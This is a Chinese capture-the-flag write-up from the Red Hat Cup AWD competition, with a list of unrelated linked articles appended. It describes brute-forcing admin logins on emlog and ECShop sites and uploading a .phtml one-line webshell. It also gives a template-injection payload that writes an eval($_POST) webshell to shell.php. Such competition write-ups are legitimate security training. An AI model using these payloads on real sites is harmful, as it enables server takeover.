红帽杯线下AWD plus writeup

简介: AWD plus writeup

粤湾期货

访问是一个由emlog的博客站点。 640.jpg

直接访问后台得知存在admin用户对admin进行暴力破解 640.jpg

上传附件处限制了文件类型,发现可添加允许添加后缀名。尝试了phpphp5等类似添加后,都会被更改为x类型,最后尝试添加phtml,成功添加。 640.png

然后直接去写文章处添加附件,并上传后缀为pthml的一句话 640.jpg

成功上传后,右键附件复制链接地址,上菜刀,成功getshell。并在根目录下找到flag 640.png640.png

粤湾租赁

访问web题目,系统为ecshopcms,发现两个登录处,一个是前台登陆,一个是后台登陆,前台登陆并未发现什么可以拿下的点。 640.jpg

已知存在admin用户,进行爆破 640.jpg

ecshop有已知的getshell方法,

直接在模板管理语言项编辑直接修改来写入shell文件搜索关键字:用户信息;用户信息四个字一定不要删除,在之后添加:(base64加密去掉了最后的=)

1.${${fputs(fopen(base64_decode(c2hlbGwucGhw),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2gnXSk7Pz3))}}

640.jpg

而后保存,保存后访问user.php即可在根目录下生成shell.phpshell。然后上菜刀,成功在根目录获得flag。 640.png


相关文章
|
3月前
|
算法 安全 Shell
2024i春秋第四届长城杯网络安全大赛暨京津冀网络安全技能竞赛初赛wp-flowershop+easyre
2024i春秋第四届长城杯网络安全大赛暨京津冀网络安全技能竞赛初赛wp-flowershop+easyre
197 1
|
8月前
|
机器学习/深度学习 人工智能 移动开发
金键盘奖揭晓!用友第五届开发者大赛圆满落幕
近日,经过长达六个月的赛程,用友第五届企业云服务开发者大赛圆满收官,这场面向企业服务领域开发者的顶级赛事不仅吸引了来自全国的开发者同台竞技,更成为了一场展示技术实力与创新精神的盛宴。
52 0
|
安全 网络安全 数据安全/隐私保护
2021工控信息安全大赛第二场WriteUp
2021工控信息安全大赛第二场WriteUp
258 0
这个阿里小二,据说全世界姑娘都羡慕她的工作
大家好,我是好奇橙。我的老板说,好奇心是人类进步的动力。所以……我决定每天进步一点点。阿里是个有趣的地方,有一群神奇的小伙伴,他们的工作奇奇怪怪、五花八门……作为一只好奇的橙子,他们都应该成为我的好朋友。今天就给大家介绍一个小姐姐,她的工作让所有姑娘们都羡慕。
379 0
这个阿里小二,据说全世界姑娘都羡慕她的工作
|
安全 API UED
哈佛校友Salesforce黑客马拉松赛夺冠,获百万美元大奖
在Salesforce.com本周举办的黑客马拉松比赛上,哈佛大学校友托姆·吉姆(Thom Kim)和约瑟夫·图利安(Joseph Turian)联手开发的移动应用Upshot最终夺冠,捧走了高达100万美元的奖金。
310 0
哈佛校友Salesforce黑客马拉松赛夺冠,获百万美元大奖
知识淘金进入黄金时代,这两家拟上科创板企业由同一清华老师创办
科创板为知识造富而生,国内顶级院校科研成果转化项目当不能错过。 10月15日,华海清科的科创板上市申请获得了上交所受理。
|
机器学习/深度学习 人工智能 供应链
【云栖风向标】VOL.3:阿里云:对不起,这个官司我不服!
面对法院对阿里云被诉侵权案作出的判决,阿里云官方做出了怎样的正式声明?你刚吃的兰州牛肉面,背后就藏着大数据!小扎曝Facebook北极数据中心图片,最先进数据中心都建在哪……更多新鲜云资讯,尽在云栖风向标!
12656 0
|
运维 Java 分布式数据库
阿里云“网红"运维工程师白金:做一个平凡的圆梦人 | 9月11号栖夜读
今天的首篇文章,讲述了:他是阿里云的一位 P8 运维专家,却很有野心得给自己取花名“辟拾(P10)”;他没有华丽的履历,仅凭着 26 年的热爱与坚持,一步一个脚印踏出了属于自己的技术逆袭之路;他爱好清奇,练就了能在 20 秒内从20000个像素块里找出不同颜色像素的“特异功能”;他乐观豁达,一言不合就讲段子的性格让他成为身边同事的“开心果”;临近不惑之年的他,经历过很多故事,但他在用自己的行动向这个世界诠释着什么是 IT 工程师告别平庸的“不惑生活”。
2922 0